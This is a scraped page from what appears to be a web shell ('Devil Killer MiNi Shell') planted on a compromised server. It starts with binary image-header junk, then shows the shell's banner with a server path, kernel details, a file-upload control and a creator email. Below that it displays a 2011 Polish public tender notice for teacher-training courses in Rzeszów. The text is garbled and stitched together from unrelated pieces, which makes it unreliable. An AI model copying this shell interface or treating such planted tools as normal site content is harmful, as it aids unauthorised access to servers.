JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110405/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110405/65176-N-2011.html

<p class="kh_header"><b>Rzeszów: Prowadzenie zajęć dydaktycznych dla nauczycieli oraz pracowników komórek oświatowych organów prowadzących szkoły i placówki oświatowe na potrzeby projektu systemowego Podkarpackie szkolenie informatyczno-metodyczne w ramach POKL09.04.00-18-133/08</b><br>
<b>Numer ogłoszenia: 65176 - 2011; data zamieszczenia: 05.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie , ul. Niedzielskiego 2, 35-036 Rzeszów, woj. podkarpackie, tel. 17 8534097, faks 17 8534682.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcen.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć dydaktycznych dla nauczycieli oraz pracowników komórek oświatowych organów prowadzących szkoły i placówki oświatowe na potrzeby projektu systemowego Podkarpackie szkolenie informatyczno-metodyczne w ramach POKL09.04.00-18-133/08.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest prowadzenie zajęć dydaktycznych na szkoleniach nauczycieli oraz pracowników komórek oświatowych organów prowadzących szkoły 
i placówki oświatowe prowadzonych w ramach projektu systemowego Podkarpackie szkolenie informatyczno-metodyczne w ramach POKL.09.04.00-18-133/08, zrekrutowanych przez Zamawiającego we wskazanym przez niego ośrodku szkoleniowym w okresie od daty podpisania umowy do 30.06.2012 r. Szkolenia odbywać się będą zgodnie z Opisem Programów Szkoleń (w skr. OPS) dostarczonych przez Zamawiającego.
2.	Przedmiotem projektu jest przeszkolenie nauczycieli przedmiotów nieinformatycznych w zakresie umiejętnego stosowania technologii informatycznej do realizacji procesu dydaktycznego oraz ich wsparcie merytoryczne i metodyczne w tym zakresie. Ponadto, przeszkolenie, pracowników komórek oświatowych organów prowadzących szkoły i placówki oświatowe w zakresie:
1)	specyfiki/uwarunkowań nauczania wspomaganego technologii informatycznej, 
2)	stosowania narzędzi społeczeństwa informacyjnego w swojej pracy, 
3)	form i metod wspomagania szkół ze względu na nauczanie w szkołach realizowane z wykorzystaniem technologii informatycznej.
3.	Cele szczegółowe projektu
1)	Podniesienie kwalifikacji zawodowych (wiedzy i umiejętności) nauczycieli i innych pracowników związanych z oświatą w województwie podkarpackim objętych projektem, w zakresie:
a)	właściwego rozumienia, diagnozowania, inicjowania, wspierania i nadzorowania przedsięwzięć oraz rozwiązywania problemów dotyczących stosowania technologii informatycznej w realizacji procesu dydaktycznego oraz obudowy tego procesu w szkołach;
b)	umiejętnego i efektywnego stosowania metod i narzędzi technologii informacyjnej w swojej pracy, 
2)	Podniesienie kwalifikacji zawodowych (wiedzy i umiejętności) nauczycieli poszczególnych przedmiotów w zakresie metodyki i dydaktyki nauczania prowadzonego z wykorzystaniem technologii informacyjnej w tym środków/narzędzi informatycznych,
3)	Uruchomienie innowacyjnego systemu certyfikacji nauczycieli i szkół Podkarpacia, w którym certyfikat potwierdzał będzie pełne opanowanie wybranych kompetencji kluczowych, 
4)	Zmniejszenie dysproporcji poziomu edukacji między wsią a miastem.
4.	Charakterystyka szkoleń realizowanych w projekcie - do realizacji celów szczegółowych (pkt 3), Szkolenia obejmować będą następujące moduły: 
1)	Moduł interpersonalny 2dni (16h) w jednej grupie
a)	Skuteczna komunikacja 
b)	Kreatywne rozwiązywanie problemów 
2)	Moduł dydaktyczny 2 dni(16h) w jednej grupie 
a)	Dydaktyka przedmiotowa 
3)	Moduł informatyczno-dydaktyczny 6 dni(48h) w jednej grupie
b)	Komputer w praktyce -Internet i jego narzędzia w dydaktyce 
c)	Narzędzia informatyczne w nauczaniu przedmiotowym 
4)	Moduł językowy 2 dni(16h) w jednej grupie
a)	Dydaktyka w pracowni językowej
Nauczyciele języków obcych odbędą szkolenia obejmujące moduły 1-4 w wymiarze 96 godzin lekcyjnych. Uczestnicy pozostałych szkoleń odbędą szkolenia obejmujące moduły 1-3 w wymiarze 80 godzin.
5.	Organizacja czasowa szkoleń.
Kurs w jednej grupie nauczycieli języków obcych obejmuje 5 zjazdów (3 zjazdy dwudniowe i 2 zjazdy trzydniowe) dla pozostałych grup kurs obejmuje 4 zjazdy (2 zjazdy dwudniowe i 2 zjazdy trzydniowe) W każdym dniu szkoleniowym realizowane będzie 8 godzin zajęć dydaktycznych podzielonych na 4 sesje (2x45 min) rozdzielonych przerwami, co można przedstawić następującym schematem:
Sesja1 - krótka przerwa - Sesja 2 - długa przerwa - Sesja 3 - krótka przerwa -Sesja 4 (...)
14.	Zamawiający dopuszcza możliwość składania ofert częściowych:
1)	Część I. Prowadzenie szkolenia nauczycieli języka polskiego - przewidywana ilość grup 3 w wymiarze 64 godzin w każdej grupie; liczba osób uczestniczących 
w każdej grupie maksymalnie 18 osób;
2)	Część II. Prowadzenie szkolenia nauczycieli biblioteki - przewidywana ilość grup 1 w wymiarze 64 godzin; liczba uczestników maksymalnie 18 osób;
3)	Część III. Prowadzenie szkolenia nauczycieli języka angielskiego - przewidywana ilość grup 1 w wymiarze 80 godzin; liczba uczestników maksymalnie 18 osób; 
4)	Część IV. Prowadzenie szkolenia nauczycieli języka niemieckiego - przewidywana ilość grup 3 w wymiarze 80 godzin w każdej grupie; liczba osób uczestniczących w każdej grupie maksymalnie 18 osób;
5)	Część V. Prowadzenie szkolenia nauczycieli fizyki - przewidywana ilość grup 2 
w wymiarze 64 godzin w każdej grupie; liczba osób uczestniczących w każdej grupie maksymalnie 18 osób;
6)	Część VI. Prowadzenie szkolenia nauczycieli chemii - przewidywana ilość grup 1 
w wymiarze 64 godzin; liczba osób uczestniczących grupie maksymalnie 18 osób;
7)	Część VII. Prowadzenie szkolenia nauczycieli przyrody - przewidywana ilość grup 2 w wymiarze 64 godzin w każdej grupie; liczba osób uczestniczących w jednej grupie maksymalnie 18 osób; 
8)	Część VIII. Prowadzenie szkolenia nauczycieli geografii - przewidywana ilość grup 3 w wymiarze 64 godzin w każdej grupie; liczba osób uczestniczących w jednej grupie maksymalnie 18 osób;
9)	Część IX. Prowadzenie szkolenia nauczycieli biologii - przewidywana ilość grup 2 w wymiarze 64 godzin w każdej grupie; liczba osób uczestniczących w jednej grupie maksymalnie 18 osób;
10)	 Część X. Prowadzenie szkolenia nauczycieli historii - przewidywana ilość grup 2 
w wymiarze 64 godzin w każdej grupie; liczba osób uczestniczących w jednej grupie maksymalnie 18 osób;
11)	Część XI. Prowadzenie szkolenia nauczycieli wychowania do życia w rodzinie - przewidywana ilość grup 2 w wymiarze 64 godzin w każdej grupie; liczba osób uczestniczących w jednej grupie maksymalnie 18 osób;
12)	Część XII. Prowadzenie szkolenia nauczycieli przedmiotów zawodowych (hotelarskich medycznych i przedsiębiorczości) - przewidywana ilość grup 3 
w wymiarze 64 godzin w każdej grupie; liczba osób uczestniczących w jednej grupie maksymalnie 18 osób;
13)	Część XIII. Prowadzenie szkolenia nauczycieli przedmiotów technicznych zawodowych (elektronicznych, elektrycznych, mechanicznych itp.) - przewidywana ilość grup, 2 w wymiarze 76 godzin w każdej grupie; liczba osób uczestniczących w jednej grupie maksymalnie 18 osób;
14)	Część XIV. Prowadzenie szkolenia nauczycieli kształcenia zintegrowanego - przewidywana ilość grup 2 w wymiarze 64 godzin; liczba osób uczestniczących 
w jednej grupie maksymalnie 18 osób;
15)	Część XV. Prowadzenie szkolenia nauczycieli wychowawców świetlic - przewidywana ilość grup 1 w wymiarze 64 godzin; liczba osób uczestniczących 
w jednej grupie maksymalnie 18 osób;
16)	Część XVI. Prowadzenie szkolenia nauczycieli plastyki - przewidywana ilość grup 2 w wymiarze 64 godzin w każdej grupie; liczba osób uczestniczących w jednej grupie maksymalnie 18 osób;
17)	Część XVII. Prowadzenie szkolenia nauczycieli muzyki - przewidywana ilość grup 2 w wymiarze 64 godzin w każdej grupie; liczba osób uczestniczących w jednej grupie maksymalnie 18 osób;
18)	Część XVIII. Prowadzenie szkolenia nauczycieli pedagogów i psychologów - szkolnych przewidywana ilość grup 1 w wymiarze 64 godzin; liczba osób uczestniczących w jednej grupie maksymalnie 18 osób;
19)	Część XIX. Prowadzenie szkolenia nauczycieli religii - przewidywana ilość grup 1 w wymiarze 64 godzin; liczba osób uczestniczących w jednej grupie maksymalnie 18 osób;
20)	Część XX. Prowadzenie szkolenia pracowników komórek oświatowych, organów prowadzących szkoły i placówki oświatowe - przewidywana ilość grup 3 
w wymiarze 64 godzin w każdej grupie; liczba osób uczestniczących w jednej grupie maksymalnie 18 osób;
Szczegółowy opis przedmiotu zamówienia zawiera SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające obejmują swym zakresem usługi objęte zamówieniem podstawowym do 50% jego wartości</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana, zgodnie z formułą spełnia/nie spełnia, w oparciu o informacje zawarte w oświadczeniu o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania powyższego warunku udziału w postępowaniu będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu Wykonawcy oraz wykazu wykonanych usług (załącznik nr 5 do SIWZ) wraz z dokumentami potwierdzającymi, że te usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana, zgodnie z formułą spełnia/nie spełnia, w oparciu o informacje zawarte w oświadczeniu o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania powyższego warunku udziału w postępowaniu (dotyczy części I-XX) będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu Wykonawcy dołączonego do oferty, wykazu osób, które będą uczestniczyć w wykonaniu zamówienia (załącznik nr 6 do SIWZ) oraz oświadczenia (załącznik nr 7 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana, zgodnie z formułą spełnia/nie spełnia, w oparciu o informacje zawarte w oświadczeniu o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe dokumenty żądane przez Zamawiającego w SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian umowy w następującym zakresie i na określonych poniżej warunkach: Strony przewidują możliwość wprowadzenia następujących zmian do umowy, w okolicznościach określonych poniżej:
a) zmiana terminu umowy - w przypadku: 
- niedotrzymania pierwotnego terminu realizacji umowy wynika z napotkania przez Wykonawcę lub Zamawiającego okoliczności niemożliwych do przewidzenia i niezależnych od nich, np. wystąpienia zjawisk związanych z działaniem siły wyższej (klęska żywiołowa, niepokoje społeczne, działania militarne itp.). 
W przypadku wystąpienia powyższej okoliczności, w zakresie mającym wpływ na przebieg realizacji zamówienia, termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania przedmiotu umowy w sposób należyty.
b) zmiana terminu płatności- w przypadku: 
- ograniczenia finansowego po stronie Zamawiającego, z przyczyn od niego niezależnych
c) zmiana w sposobie realizacji zamówienia polegająca na: zmianie osób, podwykonawców, partnerów konsorcjum i innych podmiotów współpracujących przy realizacji zamówienia pod warunkiem, że ich uprawnienia, potencjał ekonomiczny, wykonawczy i doświadczenie nie są gorsze od tych, jakie posiadają podmioty zamieniane. Zmiany te mogą nastąpić z przyczyn organizacyjnych. Przy czym zmiana wymienionych w wykazie osób może odbyć sie wyłącznie za pisemną zgodą Zamawiającego
d) zmiana wynagrodzenia: 
- zmiana urzędowej stawki podatku VAT.
Wystąpienie którejkolwiek z wymienionych powyżej okoliczności nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania takich zmian, ani nie może stanowić podstawy roszczeń Wykonawcy do ich dokonania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcen.pl/cms/przetargi.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie ul. Niedzielskiego 2
35-036 Rzeszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2011 godzina 09:00, miejsce: Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie ul. Niedzielskiego 2
35-036 Rzeszów, Sekretariat PCEN w Rzeszowie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Unii Europejskiej w ramach PO KL.09.04.00-18-133/08 na potrzeby projektu systemowego Podkarpackie szkolenie informatyczno-metodyczne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com